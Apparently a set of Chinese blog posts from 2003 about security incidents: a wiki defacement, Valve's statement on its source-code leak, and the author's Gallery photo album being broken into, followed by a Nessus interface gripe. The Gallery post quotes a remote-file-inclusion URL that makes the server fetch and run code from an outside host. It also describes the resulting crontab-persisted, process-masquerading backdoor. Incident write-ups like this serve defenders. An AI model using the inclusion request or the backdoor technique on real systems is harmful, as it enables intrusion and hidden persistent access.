Tavi’ 系統受到大規模攻擊，有人從 Google 上搜尋了「?action=edit&page=」字眼，第一筆是我的其中一個網站，wiki.debian.org.tw。攻擊者使用 209.88.121.225 連到每一個對外開放不設防的 Wiki 首頁，將首頁改為以下的畫面
Wiki 是完全不設防的共筆系統，這算是有意義的入侵嗎？對方是 DHS - Dealer Hack Security，法國人。時間是 07/Oct/2003:12:08:54 +0800。他們這麼作的原因大約只是為了登上寶座吧，這次的破壞列表於 zone-h，A-bone 戰績列表。

Valve Software 於十月二日由 Managing Director - Gabe Newell 在 http://www.halflife2.net/發表官方聲明，內容大約是他在九月十一日發現有人存取他的郵件帳號，再那之後他的電子郵件出現異常的狀態，無法開啟附件，(此時他應該已經中了 IE exploit，相關資訊遭到竊取)。直到九月十九日，程式碼目錄遭到拷貝流出。他們懷疑是 Outlook 的預覽功能作怪，導致他們的系統遭到安裝了客製化的 Remote Anywhere，所以某些系統已經證實已經遭到控制。而他也重提，過去一年來該公司的網站受於阻斷式攻擊的困擾，但他不確認這是否有關。在聲明稿中，他強調希望遊戲社群的朋友站在他那方，繼續支持他們，而如果有相關線索將資訊郵寄給 helpvalve@valvesoftware.com。
這顯然是相當愚蠢的行為，或許誰該去阻止他繼續宣揚那位入侵者的戰績，那種可憐兮兮的行為並不會獲得任何有意義的援助。然而，在聲明稿下方又附註了這麼一段

“Important: Just to be clear, it’s ok to talk about the leak and the possible implications, however we’ll nuke you and your family if you even make the most slight clever hint of where to [...]

這次來自 http://pstream.front.ru/，差點給 shell in。時間是 2003/09/27。

這次他透過我的相簿系統侵入，我使用的是舊版的 Gallery 系統，其中有一個可以讓 Windows XP 使用者方便上傳圖檔的功能。但是那隻程式有些問題，他在一開始的時候會先包含並執行起始程序($GALLERY_BASEDIR/init.php)，但是他卻不去驗證 $GALLERY_BASEDIR 的位址，依照舊版 PHP 自動將變數宣告為全域變數的習慣下，你可以透過 Get/Post/Cookie 把假的$GALLERY_BASEDIR 而 Gallery 就會很高興的把那個檔案抓回來並執行他。而我當然老早就發現這問題，並把大家討論的修正補上，可是愚蠢如我卻錯把驗證程序擺在漏洞執行程式之後。所以就給人有機可乘。
對方用了這樣的網址來入侵。

/~chihchun/gallery/publish_xp_docs.php?GALLERY_BASEDIR=http://pstream.front.ru/

所以我的程式會抓回 http://pstream.front.ru/init.php 並執行之。這個 PHP 程式裡面用 Base64 編碼並含入了另外一隻 perl script 作為木馬，PHP 程式會自動將檔案解出在 /var/tmp/.nscdrecover，並把這個 perl script 指定給 crontab 去定期執行，以確保後門常啟。這個後門倒是頗有創意，程式執行後，會把自己的名字改為 “/usr/sbin/nscd” (name service cache daemon)，某些舊版的 Unix/Linux 系統開機後都會執行這個指令，當你用 ps -awux 時，他們看起來都差不多，除了程式執行者與檔名有點差異外，它會以 UDP 協定 bind 在 port 47821，並聆聽指令，所有的指令都經過兩道簡單的加密。第一道是當指令透過 UDP 協定傳達到木馬時，必須先進行 xor [...]

我實在很受不了 Nessus 把所有的設定塞在同一個視窗，結果鬧著程式視窗大過我的桌面，我居然無法點下面的按鈕，生氣就動手 …

弄了些介面後，發現其實原本的程式其實寫的還不錯(特別是 Report)。摸摸鼻子把選項塞進 Scrolled Window，暫時解決視窗大小問題，或許會送個 patch 也不一定。改用 GTK2 後，一些元件顯然有問題，使用者介面互動變得異常怪異。